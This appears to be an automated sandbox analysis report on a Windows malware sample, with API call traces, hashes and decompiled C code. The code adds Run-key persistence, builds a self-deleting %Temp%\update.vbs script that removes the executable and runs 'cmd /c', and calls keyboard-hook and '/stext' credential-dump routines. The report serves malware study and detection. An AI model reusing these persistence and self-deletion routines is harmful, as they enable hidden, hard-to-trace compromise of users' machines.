                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                        • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B1B6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B1E8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B211
                                        • Sleep.KERNEL32(000001F4), ref: 0040B22A
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,0041B310,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B28B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B29B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?), ref: 0040B2B8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000), ref: 0040B2C5
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040B2D2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                        • String ID: /stext "
                                        • API String ID: 1338134179-3856184850
                                        • Opcode ID: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                        • Instruction ID: be4b94b66ba9b0bd8820f021ae38252d46d58d745cb1822e142cef95b78b0ffe
                                        • Opcode Fuzzy Hash: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                        • Instruction Fuzzy Hash: 4D02EDB2C0050DEBDB05EBE0EC59EDE7B7CAF54345F04806AF516A3091EB745689CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004085AC, Relevance: 138.6, APIs: 63, Strings: 16, Instructions: 308registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 20%
                                        			E004085AC(char _a4) {
				signed int _v5;
				char _v6;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				void* _v104;
				void* _v120;
				short _v640;
				void* _t63;
				char* _t65;
				WCHAR* _t68;
				char* _t69;
				char* _t71;
				char* _t74;
				char* _t75;
				char* _t76;
				char* _t77;
				signed int* _t79;
				char* _t80;
				char* _t81;
				signed int _t82;
				short* _t84;
				char* _t85;
				char* _t86;
				WCHAR* _t88;
				char* _t89;
				char* _t90;
				short* _t154;
				void* _t161;
				void* _t162;
				void* _t164;
				void* _t166;

				_t63 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t63 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t63 = E0041050F(_t63);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E00412BEE(_t63);
				}
				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, _t94, _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
				_t162 = _t161 + 0x1c;
				if(_t65 == 0) {
					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t65);
				_v5 = 1;
				_t68 = SetFileAttributesW( &_v640, 0x80);
				if(_t68 == 0) {
					_v5 = _v5 & _t68;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t68 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t68, 0x80);
				}
				_t69 =  &_v6;
				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
				_t71 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
				L0041416A();
				_t164 = _t162 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
				if(_v5 != 0) {
					_t88 =  &_v640;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
					_t89 =  &_v72;
					L0041416A();
					_t90 =  &_v24;
					L00414146();
					_t164 = _t164 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t154 = L"\"\n";
				_t74 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
				_t75 =  &_v72;
				L00414146();
				_t76 =  &_v56;
				L00414146();
				_t166 = _t164 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t76 != 0) {
					_t85 =  &_v72;
					L0041416A();
					_t86 =  &_v56;
					L00414146();
					_t166 = _t166 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t77 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
				_t79 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
				_t80 =  &_v24;
				L0041414C();
				_t81 =  &_v72;
				L0041414C();
				_t82 =  &_v56;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
				if(_t84 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
					if(_t84 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t84;
			}





































                                        0x004085b5
                                        0x004085c1
                                        0x004085c8
                                        0x004085c8
                                        0x004085d4
                                        0x004085d6
                                        0x004085d6
                                        0x004085e2
                                        0x004085e9
                                        0x004085f0
                                        0x004085f5
                                        0x00408605
                                        0x0040860f
                                        0x00408613
                                        0x0040861c
                                        0x00408621
                                        0x00408621
                                        0x0040862b
                                        0x0040862f
                                        0x0040863c
                                        0x00408641
                                        0x00408641
                                        0x0040864b
                                        0x0040864f
                                        0x00408660
                                        0x00408665
                                        0x00408665
                                        0x0040866f
                                        0x00408678
                                        0x00408698
                                        0x004086a0
                                        0x004086a5
                                        0x004086aa
                                        0x004086b6
                                        0x004086b6
                                        0x004086be
                                        0x004086c6
                                        0x004086df
                                        0x004086e3
                                        0x004086e7
                                        0x004086e9
                                        0x004086e9
                                        0x004086f7
                                        0x00408701
                                        0x00408709
                                        0x00408710
                                        0x00408710
                                        0x00408712
                                        0x00408720
                                        0x0040872b
                                        0x00408736
                                        0x00408741
                                        0x00408747
                                        0x00408753
                                        0x00408763
                                        0x00408768
                                        0x0040876e
                                        0x00408778
                                        0x00408783
                                        0x0040878d
                                        0x00408794
                                        0x0040879d
                                        0x004087a6
                                        0x004087aa
                                        0x004087af
                                        0x004087b6
                                        0x004087bf
                                        0x004087c8
                                        0x004087d1
                                        0x004087d1
                                        0x004087d7
                                        0x004087e4
                                        0x004087f0
                                        0x004087f7
                                        0x004087fb
                                        0x00408804
                                        0x00408808
                                        0x0040880d
                                        0x00408814
                                        0x0040881d
                                        0x00408826
                                        0x0040882f
                                        0x00408839
                                        0x00408843
                                        0x00408843
                                        0x00408850
                                        0x0040885a
                                        0x0040885e
                                        0x00408867
                                        0x00408870
                                        0x00408874
                                        0x00408879
                                        0x00408880
                                        0x00408889
                                        0x00408892
                                        0x00408892
                                        0x00408898
                                        0x004088a9
                                        0x004088b4
                                        0x004088c0
                                        0x004088c7
                                        0x004088cb
                                        0x004088d4
                                        0x004088d8
                                        0x004088e1
                                        0x004088e5
                                        0x004088f1
                                        0x004088fa
                                        0x00408903
                                        0x0040890c
                                        0x00408915
                                        0x0040891e
                                        0x0040892c
                                        0x00408938
                                        0x00408942
                                        0x0040894e
                                        0x00408955
                                        0x0040895f
                                        0x00408967
                                        0x00408974
                                        0x0040897d
                                        0x00408980
                                        0x00408980
                                        0x0040897d
                                        0x00408989
                                        0x00408992
                                        0x0040899b
                                        0x004089a5

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                          • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                        • _wgetenv.MSVCRT ref: 00408720
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
